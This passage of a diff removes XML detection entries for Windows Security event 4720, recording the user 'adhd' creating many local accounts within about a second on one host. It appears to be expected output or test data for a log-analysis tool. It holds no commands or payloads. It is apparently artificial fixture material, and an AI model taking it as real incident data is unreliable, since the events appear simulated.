-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Walter</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4477</recordid>
-            <time>2020-06-11 22:04:57.907601000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.9076010Z'/&gt;&lt;EventRecordID&gt;4477&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Marilyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1072&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Marilyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Marilyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4471</recordid>
-            <time>2020-06-11 22:04:57.823307300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.8233073Z'/&gt;&lt;EventRecordID&gt;4471&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Beau&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1071&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Beau&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Beau</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4465</recordid>
-            <time>2020-06-11 22:04:57.735394000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.7353940Z'/&gt;&lt;EventRecordID&gt;4465&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jessica&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1070&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jessica&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jessica</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4459</recordid>
-            <time>2020-06-11 22:04:57.643075600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.6430756Z'/&gt;&lt;EventRecordID&gt;4459&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gerald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1069&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gerald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gerald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4453</recordid>
-            <time>2020-06-11 22:04:57.557840900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.5578409Z'/&gt;&lt;EventRecordID&gt;4453&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Stephen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1068&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Stephen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Stephen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4447</recordid>
-            <time>2020-06-11 22:04:57.467546000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.4675460Z'/&gt;&lt;EventRecordID&gt;4447&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Tiffany&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1067&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Tiffany&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Tiffany</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4441</recordid>
-            <time>2020-06-11 22:04:57.386114700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.3861147Z'/&gt;&lt;EventRecordID&gt;4441&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Randy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1066&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Randy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Randy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4435</recordid>
-            <time>2020-06-11 22:04:57.295090600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.2950906Z'/&gt;&lt;EventRecordID&gt;4435&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Patricia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1065&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Patricia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Patricia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4429</recordid>
-            <time>2020-06-11 22:04:57.209098100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.2090981Z'/&gt;&lt;EventRecordID&gt;4429&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Heather&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1064&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Heather&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

